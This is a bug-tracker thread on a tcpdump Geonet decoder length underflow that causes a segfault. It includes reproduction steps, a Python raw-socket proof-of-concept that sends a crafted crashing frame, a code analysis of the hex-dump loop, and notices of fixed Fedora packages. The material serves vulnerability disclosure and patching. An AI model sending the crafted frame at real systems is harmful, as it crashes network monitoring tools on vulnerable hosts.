Tcpdump crash when processing Geonet payload was reported in [1]. The application decoder for the geonet protocol fails to perform external input validation and performs insufficient checking on length computations leading to an unsafe decrement and underflow in the function geonet_print(netdissect_options *ndo, const u_char *eth, const u_char *bp, u_int length) The affected variable is length which is later on used to print a memory chunk which eventually leads to a segfault. The function contains several unsafe computations updating the length variable. To reproduce start tcpdump on a network interface sudo tcpdump -i lo -s 0 -n -v (running the program with sudo might hide the segfault message on certain environments, see dmesg for details) and use the following python program to generate a frame on the network (might also need sudo): #!/usr/bin/env python from socket import socket, AF_PACKET, SOCK_RAW s = socket(AF_PACKET, SOCK_RAW) s.bind(("lo", 0)) geonet_frame = "\x00\x1f\xc6\x51\x07\x07\x07\x07\x07\x07\x07\x07\x07\x07\xc6\x51\x07\x07\x07\x07\x07\x07\xef\x06\x07\x35\x97\x00\x24\x8c\x7a\xdf\x6f\x08\x00\x45\x00\x00\x3d\xf3\x7f\x40\x00\x40\x11\x30\xc6\x0a\x01\x01\x68\x0a\x01\x01\x01\x99\x80\x00\x35\x00\x29\x16\xa5\x01\x76\x01\x00\x00\xff\x00\x00\x01\x00\x00\x00" s.send(geonet_frame) Affected versions are 4.5.0 through 4.6.2 (segfaults were reproducible in versions up to 4.6.1 on Ubuntu 14.04, but not reliably in 4.6.2. Code audit showed that unsafe computations are performed in 4.6.2, but the trigger frame might need to look different). [1]: http://seclists.org/bugtraq/2014/Nov/89
Created tcpdump tracking bugs for this issue: Affects: fedora-all [bug 1165166]
Created attachment 961283 [details] Fix_uncheck_length_patch_from_debian_bug
Analysis ======== In function geonet_print(netdissect_options *ndo, const u_char *eth, const u_char *bp, u_int length) size of the argument "length" is not checked before passing it to default_print() function which calls other functions as ndo_default_print()->hex_and_ascii_print() ->hex_and_ascii_print_with_offset(). In function hex_and_ascii_print_with_offset() it calculates nshorts = length / sizeof(u_short); and then while loop iterates depending on value of nshorts which is dependednt on value of argument "length" while (--nshorts >= 0) { s1 = *cp++; s2 = *cp++; (void)snprintf(hsp, sizeof(hexstuff) - (hsp - hexstuff), " %02x%02x", s1, s2); hsp += HEXDUMP_HEXSTUFF_PER_SHORT; *(asp++) = (isgraph(s1) ? s1 : '.'); *(asp++) = (isgraph(s2) ? s2 : '.'); i++; if (i >= HEXDUMP_SHORTS_PER_LINE) { *hsp = *asp = '\0'; (void)printf("%s0x%04x: %-*s %s", ident, oset, HEXDUMP_HEXSTUFF_PER_LINE, hexstuff, asciistuff); i = 0; hsp = hexstuff; asp = asciistuff; oset += HEXDUMP_BYTES_PER_LINE; } having bigger value of length causes crash.
tcpdump-4.5.1-2.fc20 has been pushed to the Fedora 20 stable repository. If problems still persist, please make note of it in this bug report.
tcpdump-4.6.2-2.fc21 has been pushed to the Fedora 21 stable repository. If problems still persist, please make note of it in this bug report.
Statement: (none)